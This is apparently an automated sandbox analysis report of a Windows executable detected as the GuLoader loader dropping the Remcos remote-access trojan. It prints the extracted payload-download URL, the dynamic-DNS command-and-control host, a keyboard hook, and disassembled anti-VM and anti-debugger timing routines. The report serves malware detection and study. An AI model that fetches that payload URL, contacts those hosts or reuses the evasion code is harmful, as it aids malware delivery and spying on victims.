Windows Analysis Report LzbZ4T1iV8.exe

Overview

General Information

Sample Name:	LzbZ4T1iV8.exe
Analysis ID:	458125
MD5:	41e1bc9de5f3b61639fb88143e933ff8
SHA1:	432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
SHA256:	d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}

Multi AV Scanner detection for submitted file

Source: LzbZ4T1iV8.exe	Virustotal: Detection: 17%			Perma Link
Source: LzbZ4T1iV8.exe	ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for sample

Source: LzbZ4T1iV8.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: LzbZ4T1iV8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin^

Uses dynamic DNS services

Source: unknown

DNS query: name: wealthyrem.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49767 -> 194.5.97.128:39200

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\LzbZ4T1iV8.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F588C NtAllocateVirtualMemory,	1_2_020F588C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA NtWriteVirtualMemory,	1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8FC4 NtProtectVirtualMemory,	1_2_020F8FC4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93EC NtResumeThread,	1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F4C19 NtWriteVirtualMemory,	1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EA4 NtWriteVirtualMemory,	1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F42C4 NtWriteVirtualMemory,	1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F58FA NtAllocateVirtualMemory,	1_2_020F58FA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F474F NtWriteVirtualMemory,	1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F43A8 NtWriteVirtualMemory,	1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F61C5 NtWriteVirtualMemory,	1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93FB NtResumeThread,	1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569B42 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569B42
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569C0E LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569C0E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569B3D TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_00569B3D

Detected potential crypto function

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404478	1_2_00404478
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404418	1_2_00404418
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404834	1_2_00404834
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004036F0	1_2_004036F0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004034F4	1_2_004034F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00403488	1_2_00403488
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004046B4	1_2_004046B4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404774	1_2_00404774
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404534	1_2_00404534
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004045F4	1_2_004045F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004035B2	1_2_004035B2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004043B8	1_2_004043B8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8680	1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0567	1_2_020F0567
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA	1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF	1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93EC	1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F4C19	1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F424C	1_2_020F424C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8A4B	1_2_020F8A4B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3C48	1_2_020F3C48
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0E55	1_2_020F0E55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8C67	1_2_020F8C67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F9E67	1_2_020F9E67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1060	1_2_020F1060
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0E7A	1_2_020F0E7A
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1070	1_2_020F1070
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0C8E	1_2_020F0C8E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F808E	1_2_020F808E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F249F	1_2_020F249F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2899	1_2_020F2899
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EA4	1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F56A3	1_2_020F56A3
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2EA2	1_2_020F2EA2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F14C6	1_2_020F14C6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F42C4	1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F20C0	1_2_020F20C0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7AD9	1_2_020F7AD9
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F10EB	1_2_020F10EB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EE6	1_2_020F7EE6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F20FE	1_2_020F20FE
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2CF2	1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3912	1_2_020F3912
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5D10	1_2_020F5D10
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7F34	1_2_020F7F34
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F474F	1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F154C	1_2_020F154C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5D5D	1_2_020F5D5D
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0B55	1_2_020F0B55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1D68	1_2_020F1D68
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1D73	1_2_020F1D73
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F43A8	1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3FBC	1_2_020F3FBC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F61C5	1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F37D8	1_2_020F37D8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BD2	1_2_020F0BD2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F77FF	1_2_020F77FF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F89FD	1_2_020F89FD
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93FB	1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F87FA	1_2_020F87FA

PE file contains strange resources

Source: LzbZ4T1iV8.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LzbZ4T1iV8.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: LzbZ4T1iV8.exe, 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1721652241.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000000.861623499.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe

Uses 32bit PE files

Source: LzbZ4T1iV8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7C81C95CE370506E.TMP

Jump to behavior

Source: LzbZ4T1iV8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: LzbZ4T1iV8.exe	Virustotal: Detection: 17%
Source: LzbZ4T1iV8.exe	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004018D2 push fs; retf	1_2_004018D4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F662F push cs; iretd	1_2_020F6630
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F003D push esp; iretd	1_2_020F003E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F00AA push esp; iretd	1_2_020F00AB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_0056A006 pushfd ; iretd	13_2_0056A007
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569F30 pushfd ; retf	13_2_00569F43

Source: initial sample

Static PE information: section name: .text entropy: 7.08169017725

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA NtWriteVirtualMemory,		1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,		1_2_020F0BEF

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:

Tries to detect Any.run

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://101.99.94.119/WEALTH_PRUUQVZW139.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F74C3 second address: 00000000020F7542 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push D90E6CFBh 0x00000010 call 00007F7AFC9FAF32h 0x00000015 mov dword ptr [ebp+04h], eax 0x00000018 mov ebx, dword ptr [eax+3Ch] 0x0000001b add eax, ebx 0x0000001d mov ebx, dword ptr [eax+78h] 0x00000020 mov eax, dword ptr [ebp+04h] 0x00000023 add eax, ebx 0x00000025 mov ecx, dword ptr [eax+18h] 0x00000028 mov dword ptr [ebp+08h], ecx 0x0000002b mov ecx, dword ptr [eax+1Ch] 0x0000002e mov dword ptr [ebp+14h], ecx 0x00000031 mov ecx, dword ptr [eax+24h] 0x00000034 mov dword ptr [ebp+10h], ecx 0x00000037 mov esi, dword ptr [eax+20h] 0x0000003a add esi, dword ptr [ebp+04h] 0x0000003d xor ecx, ecx 0x0000003f mov edx, dword ptr [esi] 0x00000041 add edx, dword ptr [ebp+04h] 0x00000044 mov dword ptr [ebp+000001F3h], eax 0x0000004a test si, 2E1Ah 0x0000004f mov eax, ecx 0x00000051 push eax 0x00000052 mov eax, dword ptr [ebp+000001F3h] 0x00000058 mov dword ptr [ebp+000001C8h], ebx 0x0000005e mov ebx, esi 0x00000060 push ebx 0x00000061 pushad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F734C second address: 00000000020F734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC9FAEFEh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F8236 second address: 00000000020F8261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC461375h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7D0C second address: 00000000020F7D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC9FAF1Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC9FAFF9h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC9FAEFAh 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC9FAF5Ch 0x00000062 call 00007F7AFC9FAF3Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC9FAFF9h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7E99 second address: 00000000020F7E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC461A6Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC461551h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:
